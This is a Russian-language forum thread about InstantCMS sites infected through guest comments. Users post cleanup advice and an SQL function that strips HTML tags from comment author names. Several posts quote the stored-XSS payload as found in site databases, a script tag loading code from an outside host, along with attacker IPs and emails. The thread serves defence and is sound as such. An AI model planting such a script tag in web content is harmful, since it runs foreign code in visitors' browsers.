Обнаружен вирус на некоторых сайтах instantcms!

Проверьте свои сайты!

Предыдущая
1
2
3
4
Следующая
Показаны 16-30 из 50

#16 8 марта 2018 в 10:10

Может из-за скриптов рекламы (яндекс, гугл) или статистики

#17 8 марта 2018 в 16:36

Добрые люди подсказали, за что им особое спасибо, что в гостевом комментарии зараза жила.
В базе записан как

'сергей <script src=\"//v1v.be/nb\">< /script>'

#18 8 марта 2018 в 16:47

Добрые люди подсказали, за что им особое спасибо, что в гостевом комментарии зараза жила.
В базе записан как
'сергей < /script>'
Дмитрий Ядов

странно, разве движок не режет сам такую фигню, если она может быть опасной

Сегодня в 11:26

#19 9 марта 2018 в 11:07

Как прибить скрипты в текстовых редакторах ?
@Elv

Они прибиты — Обрабатывать типографом.

Премодерация постов с ссылками не помешала бы .
@Elv

См. выше.
Речь шла о гостевом комментарии. Пожуём, увидим.

#20 12 марта 2018 в 10:16

Уже два раза за неделю меня яндекс выкидывает из выдачи из-за этих гостевых комментариев, вот из базы у себя вытащил строчки. можете сразу эти ip-адреса в черный список ставить. Не знаю как с этим бороться, отключить гостевые комментарии что ли.
сергей <script src="//v1v.be/nb"></script>', 'tyler979slatkin@mail.ru', '176.213.16.24
сергей <script src="//v1v.be/nb"></script>', 'harriett503mccarney@inbox.ru', '176.213.24.36

#21 12 марта 2018 в 11:40

Друзья подскажите как в комментариях включить типограф.

#22 12 марта 2018 в 13:53

В настройках компонента "комментарии->опции" снимите галку "Разрешить комментирование гостям"

Если ничто другое не помогает, прочтите, наконец, инструкцию!

#23 21 марта 2018 в 14:07

Друзья, вирус продолжает атаковать, еще два ip-адреса выявилось: 5.3.201.112, 5.164.195.135. Причем гостевые комментарии пустил через модерацию, вот на этой стадии и отлавливаю сейчас. А сегодня вирус уже регистрацию прошел на сайте, но пока ничего не нашел в результате регистрации. Комментарий с зарегистрированного пользователя был оставлен, но без вирусов пока что.
Надо что то думать с этим.

#24 21 марта 2018 в 14:28

Всё давно исправлено на github в очередной версии. Скоро будет обновление CMS.

🛠 docs.instantcms.ru

#25 21 марта 2018 в 17:40

В Демо это так и надо?
@Elv

Dr Web на демо не пускает

#26 21 марта 2018 в 20:09

Добрый день, выловили вирус и у себя. Причем как в виде девушки так и в виде комментариев. Все потёрли, от яндекса пришел репорт, мол у вас пропала подмена родительской страницы, но как обезопасить себя на будущее?

#27 21 марта 2018 в 20:53

но как обезопасить себя на будущее?
@Mstislav

Я же написал. Проблему уже исправили, очень скоро будет обновление CMS.

А пока, можете воспользоваться вот такой "лечилкой" (это SQL, скопировать и вставить во вкладку sql в phpmyadmin)

DROP FUNCTION IF EXISTS icmsStripTags;
DELIMITER |
CREATE FUNCTION icmsStripTags( Dirty VARCHAR(100) )
RETURNS VARCHAR(100)
DETERMINISTIC 
BEGIN
  DECLARE iStart, iEnd, iLength INT;
    WHILE Locate( '<', Dirty ) > 0 AND Locate( '>', Dirty, Locate( '<', Dirty )) > 0 DO
      BEGIN
        SET iStart = Locate( '<', Dirty ), iEnd = Locate( '>', Dirty, Locate('<', Dirty ));
        SET iLength = ( iEnd - iStart) + 1;
        IF iLength > 0 THEN
          BEGIN
            SET Dirty = INSERT( Dirty, iStart, iLength, '');
          END;
        END IF;
      END;
    END WHILE;
    RETURN Dirty;
END;
|
DELIMITER ;
 
UPDATE `cms_comments` SET `author_name` = icmsStripTags(author_name) WHERE `author_name` IS NOT NULL;
 
DROP FUNCTION icmsStripTags;